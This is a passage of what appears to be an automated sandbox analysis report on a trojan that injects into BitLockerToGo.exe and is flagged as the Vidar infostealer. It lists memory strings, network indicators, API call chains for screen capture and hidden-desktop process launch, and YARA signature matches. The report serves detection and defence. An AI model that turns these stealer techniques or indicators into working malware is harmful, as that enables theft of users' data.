              Source: chrome.exe, 00000005.00000002.2174830805.00006D8C002F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103456738.00006D8C00FD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103353447.00006D8C00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2104206449.00006D8C0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103781721.00006D8C0040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2101845896.00006D8C010C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2101763255.00006D8C01064000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2104135844.00006D8C00F50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2101890674.00006D8C00F9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2101814452.00006D8C01074000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103171584.00006D8C00A48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2101961003.00006D8C01090000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103123799.00006D8C00D28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103988222.00006D8C01170000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
              Source: chrome.exe, 00000005.00000002.2175249159.00006D8C004B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/:
              Source: chrome.exe, 00000005.00000002.2175249159.00006D8C004B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
              Source: chrome.exe, 00000005.00000002.2175249159.00006D8C004B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/J
              Source: chrome.exe, 00000005.00000002.2174798561.00006D8C002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2175249159.00006D8C004B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
              Source: chrome.exe, 00000005.00000002.2175469937.00006D8C00528000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2176565290.00006D8C00788000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2182243592.00006D8C010DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
              Source: chromecache_75.7.drString found in binary or memory: https://domains.google.com/suggest/flow
              Source: chrome.exe, 00000005.00000003.2086210297.00006D8C004C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-autopush.corp.google.com/
              Source: chrome.exe, 00000005.00000003.2086210297.00006D8C004C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-0.corp.google.com/
              Source: chrome.exe, 00000005.00000002.2175015119.00006D8C00344000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-1.corp.google.c
              Source: chrome.exe, 00000005.00000003.2086210297.00006D8C004C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-1.corp.google.com/
              Source: chrome.exe, 00000005.00000003.2086210297.00006D8C004C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-2.corp.google.com/
              Source: chrome.exe, 00000005.00000002.2175015119.00006D8C00344000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-3.corp.googl
              Source: chrome.exe, 00000005.00000003.2086210297.00006D8C004C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-3.corp.google.com/
              Source: chrome.exe, 00000005.00000003.2086210297.00006D8C004C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-4.corp.google.com/
              Source: chrome.exe, 00000005.00000002.2175015119.00006D8C00344000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-5.corp.google.com/
              Source: chrome.exe, 00000005.00000003.2086210297.00006D8C004C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-6.corp.google.com/
              Source: chrome.exe, 00000005.00000002.2175015119.00006D8C00344000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-preprod.corp.google.com/
              Source: chrome.exe, 00000005.00000003.2086210297.00006D8C004C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-staging.corp.google.com/
              Source: chrome.exe, 00000005.00000003.2103988222.00006D8C01170000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
              Source: chrome.exe, 00000005.00000002.2175015119.00006D8C00344000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
              Source: chrome.exe, 00000005.00000002.2175249159.00006D8C004B6000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2176294514.00006D8C00760000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/:
              Source: chrome.exe, 00000005.00000002.2175249159.00006D8C004B6000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2176294514.00006D8C00760000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2
              Source: chrome.exe, 00000005.00000002.2175249159.00006D8C004B6000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2176294514.00006D8C00760000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/J
              Source: chrome.exe, 00000005.00000002.2174913785.00006D8C0031C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2175249159.00006D8C004B6000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2176294514.00006D8C00760000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
              Source: chrome.exe, 00000005.00000002.2180202104.00006D8C00C88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2174554793.00006D8C001E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
              Source: chrome.exe, 00000005.00000002.2174554793.00006D8C001E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=searchTerms
              Source: chrome.exe, 00000005.00000002.2176912781.00006D8C0080C000.00000004.00000800.00020000.00000000.sdmp, a16ph4.4.drString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: BitLockerToGo.exe, 00000004.00000003.2194159423.00000000059E3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2691298161.00000000059E3000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2180202104.00006D8C00C88000.00000004.00000800.00020000.00000000.sdmp, a16ph4.4.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: chrome.exe, 00000005.00000002.2180202104.00006D8C00C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabp
              Source: chrome.exe, 00000005.00000002.2180202104.00006D8C00C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.ico
              Source: BitLockerToGo.exe, 00000004.00000003.2194159423.00000000059E3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2691298161.00000000059E3000.00000004.00000020.00020000.00000000.sdmp, a16ph4.4.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: chrome.exe, 00000005.00000002.2180202104.00006D8C00C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icondTripTime
              Source: chromecache_70.7.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
              Source: chromecache_70.7.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
              Source: chromecache_70.7.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
              Source: chromecache_70.7.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
              Source: chrome.exe, 00000005.00000003.2082755676.000005D000684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
              Source: chrome.exe, 00000005.00000003.2124824779.00006D8C015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/)r
              Source: chrome.exe, 00000005.00000003.2082351256.000005D000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2122260052.00006D8C01498000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2123840009.000005D00080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
              Source: chrome.exe, 00000005.00000003.2124824779.00006D8C015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/3r
              Source: chrome.exe, 00000005.00000003.2124824779.00006D8C015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/6r
              Source: chrome.exe, 00000005.00000003.2124824779.00006D8C015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/:s
              Source: chrome.exe, 00000005.00000003.2124824779.00006D8C015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/=r
              Source: chrome.exe, 00000005.00000003.2082755676.000005D000684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/hj
              Source: chrome.exe, 00000005.00000003.2124824779.00006D8C015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/uu
              Source: chrome.exe, 00000005.00000002.2172394351.000005D00078C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2124824779.00006D8C015AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2082755676.000005D000684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
              Source: chrome.exe, 00000005.00000003.2082351256.000005D000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2122260052.00006D8C01498000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2123840009.000005D00080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
              Source: chrome.exe, 00000005.00000003.2082755676.000005D000684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Ena
              Source: chrome.exe, 00000005.00000003.2082755676.000005D000684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
              Source: chrome.exe, 00000005.00000003.2126429989.00006D8C0171C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2126339639.00006D8C01718000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2126543251.00006D8C01724000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2126651208.00006D8C01730000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2126606132.00006D8C01728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2126485481.00006D8C01720000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
              Source: chrome.exe, 00000005.00000003.2122260052.00006D8C01498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
              Source: chrome.exe, 00000005.00000002.2173830012.00006D8C0000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2174554793.00006D8C001E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
              Source: chrome.exe, 00000005.00000002.2174554793.00006D8C001E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/googleapis.com
              Source: chrome.exe, 00000005.00000002.2175835689.00006D8C00644000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleusercontent.com/
              Source: chrome.exe, 00000005.00000003.2122260052.00006D8C01498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs27
              Source: chrome.exe, 00000005.00000003.2122260052.00006D8C01498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs2e
              Source: aaaieu.4.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
              Source: chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/161903006
              Source: chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/166809097
              Source: chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/184850002
              Source: chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/187425444
              Source: chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
              Source: chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/229267970
              Source: chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/250706693
              Source: chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/253522366
              Source: chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/255411748
              Source: chrome.exe, 00000005.00000002.2180233289.00006D8C00CA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/2554117481
              Source: chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/258207403
              Source: chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/274859104
              Source: chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/284462263
              Source: chrome.exe, 00000005.00000003.2093222750.00006D8C003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/issues/166475273
              Source: chrome.exe, 00000005.00000002.2175410420.00006D8C004F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2179079873.00006D8C00A54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2176912781.00006D8C0080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2176950503.00006D8C0081C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
              Source: chrome.exe, 00000005.00000002.2175410420.00006D8C004F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2179079873.00006D8C00A54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2176912781.00006D8C0080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2176950503.00006D8C0081C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEkly
              Source: chrome.exe, 00000005.00000003.2128758676.00006D8C018E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2
              Source: chrome.exe, 00000005.00000002.2171458468.000005D000238000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2128758676.00006D8C018E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard
              Source: chrome.exe, 00000005.00000003.2082351256.000005D000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2123840009.000005D00080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
              Source: chrome.exe, 00000005.00000003.2082351256.000005D000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2123840009.000005D00080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
              Source: chrome.exe, 00000005.00000002.2172324669.000005D000770000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardhttps://labs.google.com/search/experiments
              Source: chrome.exe, 00000005.00000002.2183454138.00006D8C018E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2128568672.00006D8C018D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2128758676.00006D8C018E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardm
              Source: chrome.exe, 00000005.00000002.2172324669.000005D000770000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiments
              Source: chrome.exe, 00000005.00000002.2175203811.00006D8C00454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search?source=ntp
              Source: chrome.exe, 00000005.00000003.2104206449.00006D8C0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103781721.00006D8C0040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2104135844.00006D8C00F50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103988222.00006D8C01170000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/upload
              Source: chrome.exe, 00000005.00000003.2104206449.00006D8C0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103781721.00006D8C0040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2104135844.00006D8C00F50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103988222.00006D8C01170000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/uploadbyurl
              Source: chrome.exe, 00000005.00000003.2082351256.000005D000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2123840009.000005D00080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/2
              Source: chrome.exe, 00000005.00000003.2082969856.000005D0006E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2103988222.00006D8C01170000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload
              Source: chrome.exe, 00000005.00000003.2123840009.000005D00080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload2
              Source: chrome.exe, 00000005.00000002.2172394351.000005D00078C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116Plus
              Source: chrome.exe, 00000005.00000002.2172394351.000005D00078C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116PlusEnabled_UnPinned_NewTab_20230918
              Source: chrome.exe, 00000005.00000002.2172299327.000005D000744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/uploadcompanion-iph-blocklisted-page-urlsexps-registration-success-page-u
              Source: chrome.exe, 00000005.00000003.2122260052.00006D8C01498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
              Source: chrome.exe, 00000005.00000003.2129198826.00006D8C00C70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2175047504.00006D8C00364000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=ee272b19-4411-433f-8f28-5c1
              Source: chrome.exe, 00000005.00000002.2174554793.00006D8C001E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://m.google.com/devicemanagement/data/api
              Source: chrome.exe, 00000005.00000002.2174202807.00006D8C0010C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2175249159.00006D8C004B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/:
              Source: chrome.exe, 00000005.00000002.2175203811.00006D8C00454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=rm&amp;ogbl
              Source: chrome.exe, 00000005.00000002.2174202807.00006D8C0010C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2175249159.00006D8C004B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
              Source: chrome.exe, 00000005.00000002.2174202807.00006D8C0010C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2175249159.00006D8C004B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/J
              Source: chrome.exe, 00000005.00000002.2174202807.00006D8C0010C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2174913785.00006D8C0031C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2175249159.00006D8C004B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
              Source: chrome.exe, 00000005.00000002.2175469937.00006D8C00528000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2181798474.00006D8C00F20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2176565290.00006D8C00788000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
              Source: chrome.exe, 00000005.00000002.2176789621.00006D8C007E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2181828759.00006D8C00F34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2175378897.00006D8C004D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
              Source: chrome.exe, 00000005.00000002.2181828759.00006D8C00F34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacym
              Source: chrome.exe, 00000005.00000002.2176789621.00006D8C007E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2175865435.00006D8C00660000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2175378897.00006D8C004D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
              Source: chrome.exe, 00000005.00000003.2122260052.00006D8C01498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email2B
              Source: chrome.exe, 00000005.00000003.2126429989.00006D8C0171C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2126339639.00006D8C01718000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2126881847.00006D8C01754000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2126543251.00006D8C01724000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2126651208.00006D8C01730000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2126606132.00006D8C01728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2126485481.00006D8C01720000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2126726630.00006D8C01738000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2126813737.00006D8C0174C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email?utm_source=chrome
              Source: chrome.exe, 00000005.00000003.2122260052.00006D8C01498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email?utm_source=chrome2B
              Source: chrome.exe, 00000005.00000003.2126881847.00006D8C01754000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email?utm_source=chromem
              Source: chrome.exe, 00000005.00000002.2175249159.00006D8C004B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca
              Source: chrome.exe, 00000005.00000002.2175249159.00006D8C004B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J
              Source: chrome.exe, 00000005.00000002.2174798561.00006D8C002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2175249159.00006D8C004B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
              Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 5.75.215.154:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 5.75.215.154:443 -> 192.168.2.4:56311 version: TLS 1.2
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0040EAB5 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,4_2_0040EAB5
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00405AD3 memcpy,OpenDesktopA,CreateDesktopA,lstrcpyA,CreateProcessA,Sleep,CloseDesktop,4_2_00405AD3

              System Summary

              Source: 0.2.SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe.a25c000.1.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
              Source: 4.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
              Source: 0.3.SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe.9dda000.3.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
              Source: 4.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
              Source: 0.3.SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe.9f00000.2.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
              Source: 0.2.SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe.a25c000.1.raw.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
              Source: 0.3.SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe.9f20000.1.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
              Source: 00000000.00000003.1966662723.000000000A178000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
              Source: 00000004.00000002.2689553328.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
              Source: 00000000.00000002.1977257016.000000000A25C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00404B3F4_2_00404B3F
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004151474_2_00415147
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00417D564_2_00417D56
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0040AF7E4_2_0040AF7E
